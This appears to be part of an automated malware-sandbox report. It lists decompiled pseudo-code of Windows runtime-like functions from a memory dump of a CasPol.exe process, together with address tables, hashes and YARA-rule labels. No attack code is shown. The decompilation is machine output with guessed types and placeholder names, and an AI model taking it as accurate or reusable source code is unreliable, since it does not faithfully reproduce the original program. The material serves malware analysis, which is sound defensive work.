                                                                                                                                                                                                                                                                                                0x01783768
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a5
                                                                                                                                                                                                                                                                                                0x017837a7
                                                                                                                                                                                                                                                                                                0x017837ad
                                                                                                                                                                                                                                                                                                0x017837b0
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x017837bc
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376f
                                                                                                                                                                                                                                                                                                0x01783775
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783777
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x01783782
                                                                                                                                                                                                                                                                                                0x01783787
                                                                                                                                                                                                                                                                                                0x01783789
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x01783792
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783768
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x01783751
                                                                                                                                                                                                                                                                                                0x01783749
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783740
                                                                                                                                                                                                                                                                                                0x017291a0
                                                                                                                                                                                                                                                                                                0x017291a3
                                                                                                                                                                                                                                                                                                0x017291a9
                                                                                                                                                                                                                                                                                                0x017291b0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017291b0
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291bb
                                                                                                                                                                                                                                                                                                0x017291c0
                                                                                                                                                                                                                                                                                                0x017291c5
                                                                                                                                                                                                                                                                                                0x017291c7
                                                                                                                                                                                                                                                                                                0x017837da
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291d2
                                                                                                                                                                                                                                                                                                0x017291d5
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x017291d7
                                                                                                                                                                                                                                                                                                0x017291db
                                                                                                                                                                                                                                                                                                0x017291e1
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x017291fd
                                                                                                                                                                                                                                                                                                0x01729203
                                                                                                                                                                                                                                                                                                0x0172921e
                                                                                                                                                                                                                                                                                                0x01729223
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729205
                                                                                                                                                                                                                                                                                                0x01729205
                                                                                                                                                                                                                                                                                                0x01729208
                                                                                                                                                                                                                                                                                                0x0172920c
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x0172920c
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291ee
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729134
                                                                                                                                                                                                                                                                                                0x01729125
                                                                                                                                                                                                                                                                                                0x0172911d
                                                                                                                                                                                                                                                                                                0x0172914e
                                                                                                                                                                                                                                                                                                0x017290d1
                                                                                                                                                                                                                                                                                                0x017290d1
                                                                                                                                                                                                                                                                                                0x017290d3
                                                                                                                                                                                                                                                                                                0x017290d6
                                                                                                                                                                                                                                                                                                0x017290d8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017290d8
                                                                                                                                                                                                                                                                                                0x017290cf

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ac9cca396a35d4af95086352d441fc5d3fd63ee062eb56a482a9ad2ea173990
                                                                                                                                                                                                                                                                                                • Instruction ID: 588fe35c7610f68bad952f982ef08c47e7c14953e956bfb6d1005d96b1ad7071
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ac9cca396a35d4af95086352d441fc5d3fd63ee062eb56a482a9ad2ea173990
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F501F47350122A8FD3358F08D840B11FBA9EF83324F294166E701CB696C378DD42CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F4015 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                                			E017F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01742280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01742280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18186ac);
					E0172F900(0x18186d4, _t28);
					L0173FFB0(0x18186ac, _t28, 0x18186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L0173FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                                                                                                                                                                                                0x017f401a
                                                                                                                                                                                                                                                                                                0x017f401e
                                                                                                                                                                                                                                                                                                0x017f4023
                                                                                                                                                                                                                                                                                                0x017f4028
                                                                                                                                                                                                                                                                                                0x017f4029
                                                                                                                                                                                                                                                                                                0x017f402b
                                                                                                                                                                                                                                                                                                0x017f402f
                                                                                                                                                                                                                                                                                                0x017f4043
                                                                                                                                                                                                                                                                                                0x017f4046
                                                                                                                                                                                                                                                                                                0x017f4051
                                                                                                                                                                                                                                                                                                0x017f4057
                                                                                                                                                                                                                                                                                                0x017f405f
                                                                                                                                                                                                                                                                                                0x017f4062
                                                                                                                                                                                                                                                                                                0x017f4067
                                                                                                                                                                                                                                                                                                0x017f406f
                                                                                                                                                                                                                                                                                                0x017f407c
                                                                                                                                                                                                                                                                                                0x017f407c
                                                                                                                                                                                                                                                                                                0x017f408c
                                                                                                                                                                                                                                                                                                0x017f408c
                                                                                                                                                                                                                                                                                                0x017f4097

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a65c698f21de79bd718f2b84b5518466e551436890f38ce14408fb2901870cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 1500e476fe3c0174aa85afad1227953b57e8a64112163ab56e88b542dd06bb18
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a65c698f21de79bd718f2b84b5518466e551436890f38ce14408fb2901870cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4501A2726019467FD211AB79CD88E13F7ACFF95760B000629F608C3A26CB24EC11CAE4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017E138A Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E017E138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x181d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0176FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01747D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L0176B640(E01769AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                                                                                                                                                                                                                                                                0x017e138a
                                                                                                                                                                                                                                                                                                0x017e138a
                                                                                                                                                                                                                                                                                                0x017e1399
                                                                                                                                                                                                                                                                                                0x017e13a3
                                                                                                                                                                                                                                                                                                0x017e13a8
                                                                                                                                                                                                                                                                                                0x017e13aa
                                                                                                                                                                                                                                                                                                0x017e13b5
                                                                                                                                                                                                                                                                                                0x017e13bb
                                                                                                                                                                                                                                                                                                0x017e13c3
                                                                                                                                                                                                                                                                                                0x017e13c6
                                                                                                                                                                                                                                                                                                0x017e13c9
                                                                                                                                                                                                                                                                                                0x017e13d4
                                                                                                                                                                                                                                                                                                0x017e13e6
                                                                                                                                                                                                                                                                                                0x017e13d6
                                                                                                                                                                                                                                                                                                0x017e13df
                                                                                                                                                                                                                                                                                                0x017e13df
                                                                                                                                                                                                                                                                                                0x017e13f1
                                                                                                                                                                                                                                                                                                0x017e13f2
                                                                                                                                                                                                                                                                                                0x017e13f4
                                                                                                                                                                                                                                                                                                0x017e140e

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 89cd7df74606626d395c110998a6f1327fba793da09bb4022ad1e54df651f313
                                                                                                                                                                                                                                                                                                • Instruction ID: e7722a817805f185abf8047162a998ea7128ff0d082d66116cca11147e7d5544
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89cd7df74606626d395c110998a6f1327fba793da09bb4022ad1e54df651f313
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C015271A00319AFDB14DFA9D846FAEFBF8EF55710F404056F904EB280DA749A41CB94
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F1074 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E017F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L017F165E(__ebx, 0x1818ae4, (__edx -  *0x1818b04 >> 0x14) + (__edx -  *0x1818b04 >> 0x14), __edi, __ecx, (__edx -  *0x1818b04 >> 0x14) + (__edx -  *0x1818b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L017EAFDE( &_v8,  &_v12);
				if(E01747D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L017DFE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                                                                                                                                                                                                                                                                                                0x017f1074
                                                                                                                                                                                                                                                                                                0x017f1080
                                                                                                                                                                                                                                                                                                0x017f1082
                                                                                                                                                                                                                                                                                                0x017f108a
                                                                                                                                                                                                                                                                                                0x017f108f
                                                                                                                                                                                                                                                                                                0x017f1093
                                                                                                                                                                                                                                                                                                0x017f10a8
                                                                                                                                                                                                                                                                                                0x017f10ab
                                                                                                                                                                                                                                                                                                0x017f10ab
                                                                                                                                                                                                                                                                                                0x017f10b0
                                                                                                                                                                                                                                                                                                0x017f10b7
                                                                                                                                                                                                                                                                                                0x017f10be
                                                                                                                                                                                                                                                                                                0x017f10c3
                                                                                                                                                                                                                                                                                                0x017f10cf
                                                                                                                                                                                                                                                                                                0x017f10e1
                                                                                                                                                                                                                                                                                                0x017f10d1
                                                                                                                                                                                                                                                                                                0x017f10da
                                                                                                                                                                                                                                                                                                0x017f10da
                                                                                                                                                                                                                                                                                                0x017f10e9
                                                                                                                                                                                                                                                                                                0x017f10f5
                                                                                                                                                                                                                                                                                                0x017f10f5
                                                                                                                                                                                                                                                                                                0x017f10fe

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ff215d96625d70dbd67179192f4d08ecf74ff565e2ffb206872b8a5d81cd7b6c
                                                                                                                                                                                                                                                                                                • Instruction ID: ea8d062e610cd7b71aa78b18d29ecbcb6139dff0c028840125051dfcd14c0637
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff215d96625d70dbd67179192f4d08ecf74ff565e2ffb206872b8a5d81cd7b6c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A012872604746DBC710DF28C944B1BFBE9AB84310F44C529FA8583394DE30D541CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0173B02A Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0173B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01747D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E017A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                                                                                                                                                                                0x0173b037
                                                                                                                                                                                                                                                                                                0x0173b039
                                                                                                                                                                                                                                                                                                0x0173b03b
                                                                                                                                                                                                                                                                                                0x0173b040
                                                                                                                                                                                                                                                                                                0x0178a60e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178a61d
                                                                                                                                                                                                                                                                                                0x0173b04b
                                                                                                                                                                                                                                                                                                0x0173b04e
                                                                                                                                                                                                                                                                                                0x0178a627
                                                                                                                                                                                                                                                                                                0x0178a634
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178a641
                                                                                                                                                                                                                                                                                                0x0178a653
                                                                                                                                                                                                                                                                                                0x0178a643
                                                                                                                                                                                                                                                                                                0x0178a64c
                                                                                                                                                                                                                                                                                                0x0178a64c
                                                                                                                                                                                                                                                                                                0x0178a65b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178a66c
                                                                                                                                                                                                                                                                                                0x0173b057
                                                                                                                                                                                                                                                                                                0x0173b057
                                                                                                                                                                                                                                                                                                0x0173b057
                                                                                                                                                                                                                                                                                                0x0173b046
                                                                                                                                                                                                                                                                                                0x0173b046
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                                                                                                                • Instruction ID: 953ba90b9c05cfa7a9b972ed2f45b0d18eacfd2b3b1a32bdee2845ab021bd94b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1018F723449809FE726971DC988F66FBD8EBC5754F0900A2FA19CBA56D728DC40C621
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F8A62 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                                			E017F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x181d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01747D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L0176B640(E01769AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                                                                                                                                                                                                                                                                                                0x017f8a62
                                                                                                                                                                                                                                                                                                0x017f8a71
                                                                                                                                                                                                                                                                                                0x017f8a79
                                                                                                                                                                                                                                                                                                0x017f8a82
                                                                                                                                                                                                                                                                                                0x017f8a85
                                                                                                                                                                                                                                                                                                0x017f8a89
                                                                                                                                                                                                                                                                                                0x017f8a8c
                                                                                                                                                                                                                                                                                                0x017f8a8f
                                                                                                                                                                                                                                                                                                0x017f8a92
                                                                                                                                                                                                                                                                                                0x017f8a95
                                                                                                                                                                                                                                                                                                0x017f8a9f
                                                                                                                                                                                                                                                                                                0x017f8ab1
                                                                                                                                                                                                                                                                                                0x017f8aa1
                                                                                                                                                                                                                                                                                                0x017f8aaa
                                                                                                                                                                                                                                                                                                0x017f8aaa
                                                                                                                                                                                                                                                                                                0x017f8abc
                                                                                                                                                                                                                                                                                                0x017f8abd
                                                                                                                                                                                                                                                                                                0x017f8abf
                                                                                                                                                                                                                                                                                                0x017f8ada

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ac4cf84011854617aed3892cf328d1b230ec6bd5d95a09d69e3dca45161dbcb
                                                                                                                                                                                                                                                                                                • Instruction ID: 90f610716756d5d5324b5d62982de7cb78ba5c0762b2e9e0225e05e4ab5a36f3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ac4cf84011854617aed3892cf328d1b230ec6bd5d95a09d69e3dca45161dbcb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B012C71A0021DAFCB04DFA9D9459AEFBB8EF58310F10405AFA04E7341EB34AA00CBA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172DB60 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0172DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L0172E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0172E8B0(__ecx, _t14, 0xfff);
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                                                                                                                                                                                                0x0172db64
                                                                                                                                                                                                                                                                                                0x0172db66
                                                                                                                                                                                                                                                                                                0x0172db6b
                                                                                                                                                                                                                                                                                                0x0172dbaa
                                                                                                                                                                                                                                                                                                0x0172db71
                                                                                                                                                                                                                                                                                                0x0172db76
                                                                                                                                                                                                                                                                                                0x0172db7a
                                                                                                                                                                                                                                                                                                0x0172dba3
                                                                                                                                                                                                                                                                                                0x0172db7c
                                                                                                                                                                                                                                                                                                0x0172db87
                                                                                                                                                                                                                                                                                                0x0172db8b
                                                                                                                                                                                                                                                                                                0x01784fa1
                                                                                                                                                                                                                                                                                                0x01784fb3
                                                                                                                                                                                                                                                                                                0x01784fb8
                                                                                                                                                                                                                                                                                                0x0172db91
                                                                                                                                                                                                                                                                                                0x0172db96
                                                                                                                                                                                                                                                                                                0x0172db98
                                                                                                                                                                                                                                                                                                0x0172db98
                                                                                                                                                                                                                                                                                                0x0172db8b
                                                                                                                                                                                                                                                                                                0x0172db7a
                                                                                                                                                                                                                                                                                                0x0172db9d
                                                                                                                                                                                                                                                                                                0x0172dba2

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                                                                                                                • Instruction ID: 0cb4341fdc1936779609a73bbd3e81722c1901b6acaaed4dd66b93c74bcd620f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F09C332455339BD7336AD9C8A4F57FA969FD2A60F150475F2059B348CE608C0396D1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172B1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01747D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01747D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E017A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                                                                                                                                                                                0x0172b1e8
                                                                                                                                                                                                                                                                                                0x0172b1ea
